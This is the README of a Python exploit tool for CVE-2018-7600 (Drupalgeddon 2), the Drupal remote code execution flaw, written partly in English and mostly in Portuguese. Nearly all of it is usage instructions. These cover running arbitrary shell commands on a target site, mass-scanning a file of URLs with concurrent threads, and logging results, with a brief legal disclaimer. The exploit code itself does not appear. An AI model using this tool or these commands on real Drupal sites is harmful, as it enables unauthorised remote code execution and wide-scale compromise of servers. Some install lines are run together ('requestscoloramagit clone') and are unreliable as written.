
This repository showcases a fully self-developed Proof-of-Concept (PoC) for CVE-2018-7600, widely known as Drupalgeddon 2. This critical vulnerability in Drupal 7 and 8 core enables remote code execution (RCE), and the PoC demonstrates its exploitation in a clear and educational manner.
Este repositório contém um exploit de prova de conceito baseado em Python para a vulnerabilidade crítica de execução remota de código no Drupal, conhecida como Drupalgeddon2 (CVE-2018-7600). Este script foi projetado para fins educacionais e para profissionais de segurança utilizarem em cenários autorizados de teste de penetração.
Esta ferramenta destina-se apenas a fins legais e éticos. Usar este script em qualquer sistema sem permissão explícita do proprietário é ilegal. O autor e os colaboradores não são responsáveis por qualquer uso indevido ou danos causados por este script. Use por sua conta e risco.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
O script oferece vários argumentos de linha de comando para personalizar sua execução.
Explorar um único alvo com o comando padrão (whoami):
python3 drupalgeddon2.py -t http://example.com
Explorar um único alvo com um comando personalizado (ex.: ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Escaneie uma lista de alvos de um arquivo:
Crie um arquivo chamado targets.txt com uma URL por linha:
http://site1.com
https://site2.org
http://site3.net
Em seguida, execute o script:
python3 drupalgeddon2.py -l targets.txt
Escaneie uma lista com um comando personalizado e aumento de threads:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Salve a saída em um arquivo de log:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argumento | Abreviado | Descrição | Padrão |
|---|
--target | -t | Uma única URL alvo. | - |
--list | -l | Caminho para um arquivo contendo uma lista de URLs alvo. | - |
--command | -c | O comando a ser executado no alvo. | whoami |
--threads | -T | Número de threads concorrentes a usar. | 5 |
--output | -o | Arquivo para registrar a saída. | - |
--timeout | Tempo limite de requisição em segundos. | 15 |